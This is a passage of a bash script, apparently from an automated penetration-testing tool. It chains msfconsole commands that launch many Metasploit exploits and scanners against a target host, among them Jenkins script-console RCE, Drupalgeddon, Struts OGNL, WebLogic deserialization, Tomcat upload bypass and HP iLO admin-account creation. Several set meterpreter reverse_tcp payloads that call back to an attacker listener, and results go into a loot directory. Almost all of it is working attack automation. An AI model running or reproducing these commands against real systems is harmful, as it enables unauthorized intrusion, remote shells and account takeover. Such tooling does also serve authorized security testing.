sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
#echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
#echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET"
#echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
#msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
#sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
#rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET"
